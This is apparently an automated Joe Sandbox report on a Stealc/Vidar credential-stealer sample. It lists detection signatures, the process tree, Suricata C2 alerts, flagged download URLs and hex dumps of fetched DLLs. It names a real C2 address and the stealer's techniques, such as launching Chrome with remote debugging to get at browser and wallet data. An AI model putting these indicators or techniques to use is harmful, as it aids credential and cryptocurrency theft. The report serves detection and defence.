Edit tour

Windows Analysis Report
0vsAIy0DhJ.exe

Overview

General Information

Sample name:	0vsAIy0DhJ.exe renamed because original name is a hash value
Original sample name:	0450c46fed73f12abf70136a969e1d7e3d99df399b6639ac0db42249c268047c.exe
Analysis ID:	1620676
MD5:	373c8e521ae5529ec40bcc97e81ebf02
SHA1:	e7ca825a8d986cfa1dd49c75a7a98b5f35bf42dc
SHA256:	0450c46fed73f12abf70136a969e1d7e3d99df399b6639ac0db42249c268047c
Tags:	exeStealcuser-zhuzhu0009
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

0vsAIy0DhJ.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\0vsAIy0DhJ.exe" MD5: 373C8E521AE5529EC40BCC97E81EBF02)

chrome.exe (PID: 5808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2160,i,1634129405105479003,15236246413488024638,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 0vsAIy0DhJ.exe PID: 2004	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 0vsAIy0DhJ.exe PID: 2004	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 0vsAIy0DhJ.exe PID: 2004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0vsAIy0DhJ.exe PID: 2004	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\0vsAIy0DhJ.exe", ParentImage: C:\Users\user\Desktop\0vsAIy0DhJ.exe, ParentProcessId: 2004, ParentProcessName: 0vsAIy0DhJ.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 5808, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:10.174846+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49731	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:10.167942+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:10.390509+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:11.630453+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:10.397990+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49731	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:09.946069+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49731	185.215.113.115	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:18:12.064865+0100	2803304	3	Unknown Traffic	192.168.2.4	49731	185.215.113.115	80	TCP
2025-02-21T07:18:24.972029+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP
2025-02-21T07:18:26.545101+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP
2025-02-21T07:18:27.222144+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP
2025-02-21T07:18:28.066947+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP
2025-02-21T07:18:31.938029+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP
2025-02-21T07:18:32.658628+0100	2803304	3	Unknown Traffic	192.168.2.4	49753	185.215.113.115	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0vsAIy0DhJ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlld	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dlla	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dlle	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpB	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpxA	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpD	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprofiles	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllp	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll$	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll4	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpl:z0	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php3#z7	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php8	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0vsAIy0DhJ.exe.2004.0.memstrmin

Malware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Multi AV Scanner detection for submitted file

Source: 0vsAIy0DhJ.exe	ReversingLabs: Detection: 65%
Source: 0vsAIy0DhJ.exe	Virustotal: Detection: 63%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C5EA9A0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E4440 PK11_PrivDecrypt,	0_2_6C5E4440
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C5B4420
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E44C0 PK11_PubEncrypt,	0_2_6C5E44C0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C6325B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6C5EA650
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6C5C8670
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6C5CE6E0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6C60A730
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6C610180
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6C5E43B0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6C607C00
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6C5C7D60
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6C60BD30
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6C609EC0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,	0_2_6C5E3FF0
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	0_2_6C5E3850
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Code function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	0_2_6C5E9840

Source: 0vsAIy0DhJ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49731 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49731
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49731 -> 185.215.113.115:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.215.113.115/c4becf79229cb002.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 